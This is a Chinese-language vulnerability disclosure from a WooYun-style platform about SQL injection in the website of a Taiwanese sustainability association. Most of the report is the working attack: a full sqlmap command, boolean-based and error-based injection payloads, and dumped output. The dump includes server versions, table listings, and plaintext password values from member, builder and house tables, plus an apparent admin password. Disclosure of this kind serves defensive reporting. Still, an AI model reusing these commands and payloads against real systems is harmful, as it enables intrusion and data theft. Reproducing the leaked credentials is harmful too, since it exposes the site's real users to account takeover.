乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
台灣永續關懷協會网站存在SQL注射漏洞(数万用户明文密码泄露)
地址:http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1
$ python sqlmap.py -u "http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1" -p assortment_id --technique=BE --output-dir=output --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
Database: formosa21comtwTable: house[5334 entries]+------------+| passwd |+------------+| 0000 || 0088 || 0227975688 || 0260 |
Database: formosa21comtwTable: builder[13876 entries]+--------------+| passwd |+--------------+| \t27413927 || \t80668413 || \t84832892 || 03720209 || 04738240 || 05146004 || 12771214& || 12771214& || 13036261 || 21261424 || 22957034 || 23295619 || 27205104 || 27212652 || 27299340& || 27299340& || 27299340& || 27426009 || 27427464& || 27462882& || 27462882& || 27462882& || 27475578 || 27594379 || 27594379& || 27645089 || 27653995& |
Database: formosa21comtwTable: member[2698 entries]+------------+| passwd |+------------+| 0 || 0000 || 0000 || 0000 || 0000 || 000000 || 000000 || 000000 || 000000 || 000000 || 000000 || 000000 |
</code>
---Parameter: assortment_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cname=PbQx&assortment_id=1 AND 1234=1234 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cname=PbQx&assortment_id=1 AND (SELECT 7723 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(7723=7723,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.12back-end DBMS: MySQL 5.0current user: 'formosa21_2951@%'current user is DBA: Falsedatabase management system users [1]:[*] 'formosa21_2951'@'%'Database: formosa21comtw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| visit_count2 | 92163 || comforum1 | 32892 || dad_count | 31348 || builder | 13876 || news | 7834 || comforum | 7118 || house | 5334 || member | 2698 || house_ad | 2275 || house_article | 1992 || sell_house | 1767 || project_info | 1632 || poll_log | 1299 || rent_sell | 1100 || activity | 928 || member_confirm | 565 || project | 481 || committee | 453 || house_subject | 446 || rule | 268 || candidate | 258 || discuss_score_month | 204 || prize_list | 199 || discuss_score_year | 153 || builder_news | 116 || ad | 85 || builder_link | 80 || point | 80 || message | 72 || asp_title | 66 || club_member | 65 || rad | 65 || link | 61 || news_front | 45 || album | 32 || onlinecount | 25 || club | 22 || club_comforum | 22 || uniont | 22 || visit_count | 22 || dad | 20 || prize | 16 || assortment | 12 || mem_point | 12 || poll_data | 12 || prize_winner | 10 || advertise | 9 || showa | 8 || comforum_assortment | 6 || asp2 | 5 || auto_email_sender | 5 || email_visit_count | 5 || prize_winner_name | 5 || top_link | 4 || poll_index | 3 || club_comforum1 | 2 || friend_link | 2 || member_second | 2 || readsign | 2 || admin | 1 || company | 1 || creditcard | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1065 || SESSION_VARIABLES | 327 || GLOBAL_VARIABLES | 316 || GLOBAL_STATUS | 310 || SESSION_STATUS | 310 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 104 || TABLES | 104 || STATISTICS | 98 || KEY_COLUMN_USAGE | 58 || TABLE_CONSTRAINTS | 58 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 18 || ENGINES | 9 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: formosa21comtwTable: rent_sell[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: admin[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(20) |+--------+-------------+Database: formosa21comtwTable: house[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: builder[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: creditcard[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: member[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: prize_winner_name[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: company[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+Database: formosa21comtwTable: sell_house[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(10) |+--------+-------------+
Database: formosa21comtwTable: admin[1 entry]+-------------+| passwd |+-------------+| lion4052xyz |+-------------+Database: formosa21comtwTable: house[5334 entries]+------------+| passwd |+------------+| 0000 || 0088 || 0227975688 || 0260 |
上WAF。
危害等级:高
漏洞Rank:17
确认时间:2015-12-08 02:42
感謝通報
暂无
